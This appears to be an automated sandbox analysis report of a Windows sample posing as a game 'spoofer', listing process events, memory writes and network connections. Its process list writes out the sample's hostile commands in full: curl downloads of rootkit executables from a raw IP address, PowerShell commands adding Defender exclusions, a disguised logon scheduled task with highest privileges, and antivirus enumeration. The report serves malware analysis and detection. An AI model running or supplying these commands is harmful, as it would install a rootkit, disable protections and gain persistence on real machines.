N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\system32\cmd.exe
PID 116 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\system32\cmd.exe
PID 2008 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2008 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2008 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2008 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2008 wrote to memory of 1080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2008 wrote to memory of 1080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 116 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\system32\cmd.exe
PID 116 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\system32\cmd.exe
PID 1492 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1492 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start https://feds.lol/udman

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://feds.lol/udman

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb50d746f8,0x7ffb50d74708,0x7ffb50d74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe

C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe

C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\System32\Wbem\WMIC.exe

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe" /rl HIGHEST /f >nul

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/hackeroopsecstubblucky/raw"

C:\Windows\system32\curl.exe

curl -s "https://rentry.co/hackeroopsecstubblucky/raw"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkitinstalllinklol/raw"

C:\Windows\system32\curl.exe

curl -s "https://rentry.co/rootkitinstalllinklol/raw"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkituninstalllinklol/raw"

C:\Windows\system32\curl.exe

curl -s "https://rentry.co/rootkituninstalllinklol/raw"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\System32\Wbem\WMIC.exe

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp --silent

C:\Windows\system32\curl.exe

curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp --silent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp --silent

C:\Windows\system32\curl.exe

curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp --silent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=5316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=5428 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/RootkitInstall.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp --silent

C:\Windows\system32\curl.exe

curl http://104.254.246.35/files/RootkitInstall.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp --silent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\System32\Wbem\WMIC.exe

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3056 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 spoofer.mom udp
US 104.21.73.244:443 spoofer.mom tcp
US 8.8.8.8:53 244.73.21.104.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
N/A 127.0.0.1:55844 tcp
N/A 127.0.0.1:55846 tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:55892 tcp
N/A 127.0.0.1:55894 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 8.8.8.8:53 feds.lol udp
US 104.21.35.133:443 feds.lol tcp
N/A 127.0.0.1:55905 tcp
N/A 127.0.0.1:55907 tcp
US 8.8.8.8:53 rentry.co udp
US 104.26.2.16:443 rentry.co tcp
US 104.26.2.16:443 rentry.co tcp
US 8.8.8.8:53 133.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 16.2.26.104.in-addr.arpa udp
US 104.26.2.16:443 rentry.co tcp
US 104.254.246.35:80 104.254.246.35 tcp
US 104.254.246.35:80 104.254.246.35 tcp
US 8.8.8.8:53 35.246.254.104.in-addr.arpa udp
US 8.8.8.8:53 unpkg.com udp
US 104.17.246.203:443 unpkg.com tcp
US 8.8.8.8:53 open.spotify.com udp
US 151.101.3.42:443 open.spotify.com tcp
US 8.8.8.8:53 certificates.starfieldtech.com udp
US 192.124.249.36:80 certificates.starfieldtech.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 203.246.17.104.in-addr.arpa udp
US 8.8.8.8:53 42.3.101.151.in-addr.arpa udp
US 8.8.8.8:53 36.249.124.192.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 i.scdn.co udp
NL 2.18.121.91:443 i.scdn.co tcp
US 8.8.8.8:53 embed-cdn.spotifycdn.com udp
US 199.232.214.250:443 embed-cdn.spotifycdn.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
N/A 224.0.0.251:5353 udp
US 199.232.214.250:443 embed-cdn.spotifycdn.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 8.8.8.8:53 91.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 250.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.79.16.104.in-addr.arpa udp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 8.8.8.8:53 o22381.ingest.sentry.io udp
US 34.120.195.249:443 o22381.ingest.sentry.io tcp
US 8.8.8.8:53 encore.scdn.co udp
NL 2.18.121.91:443 encore.scdn.co tcp
NL 2.18.121.91:443 encore.scdn.co tcp
US 8.8.8.8:53 249.195.120.34.in-addr.arpa udp
US 8.8.8.8:53 apresolve.spotify.com udp
US 35.186.224.24:443 apresolve.spotify.com tcp
US 35.186.224.24:443 apresolve.spotify.com udp
US 8.8.8.8:53 api.iconify.design udp
US 172.67.71.159:443 api.iconify.design tcp
US 8.8.8.8:53 24.224.186.35.in-addr.arpa udp
US 8.8.8.8:53 159.71.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.unisvg.com udp
US 172.67.163.187:443 api.unisvg.com tcp
US 8.8.8.8:53 apps.identrust.com udp
IE 2.18.24.8:80 apps.identrust.com tcp
US 8.8.8.8:53 gew1-spclient.spotify.com udp
US 35.186.224.26:443 gew1-spclient.spotify.com tcp
US 35.186.224.26:443 gew1-spclient.spotify.com tcp
US 35.186.224.26:443 gew1-spclient.spotify.com tcp
US 35.186.224.26:443 gew1-spclient.spotify.com tcp
US 8.8.8.8:53 187.163.67.172.in-addr.arpa udp
US 8.8.8.8:53 8.24.18.2.in-addr.arpa udp
US 35.186.224.26:443 gew1-spclient.spotify.com udp
US 8.8.8.8:53 spclient.wg.spotify.com udp
US 35.186.224.24:443 spclient.wg.spotify.com tcp
US 8.8.8.8:53 web-sdk-assets.spotifycdn.com udp
US 199.232.214.250:443 web-sdk-assets.spotifycdn.com tcp
US 8.8.8.8:53 26.224.186.35.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 104.254.246.35:80 104.254.246.35 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49721 tcp
N/A 127.0.0.1:49723 tcp
N/A 127.0.0.1:49819 tcp
N/A 127.0.0.1:49821 tcp
N/A 127.0.0.1:49825 tcp
N/A 127.0.0.1:49827 tcp
N/A 127.0.0.1:49830 tcp
N/A 127.0.0.1:49832 tcp
N/A 127.0.0.1:49835 tcp
N/A 127.0.0.1:49837 tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49846 tcp
N/A 127.0.0.1:49848 tcp
N/A 127.0.0.1:49851 tcp
N/A 127.0.0.1:49853 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49856 tcp
N/A 127.0.0.1:49858 tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49862 tcp
N/A 127.0.0.1:49864 tcp
N/A 127.0.0.1:49867 tcp
N/A 127.0.0.1:49869 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49872 tcp
N/A 127.0.0.1:49874 tcp
N/A 127.0.0.1:49877 tcp
N/A 127.0.0.1:49879 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49882 tcp
N/A 127.0.0.1:49884 tcp
N/A 127.0.0.1:49887 tcp
N/A 127.0.0.1:49889 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49894 tcp
N/A 127.0.0.1:49896 tcp
N/A 127.0.0.1:49899 tcp
N/A 127.0.0.1:49901 tcp
N/A 127.0.0.1:49905 tcp
N/A 127.0.0.1:49907 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49912 tcp
N/A 127.0.0.1:49914 tcp
N/A 127.0.0.1:49917 tcp
N/A 127.0.0.1:49919 tcp
N/A 127.0.0.1:49922 tcp
N/A 127.0.0.1:49924 tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
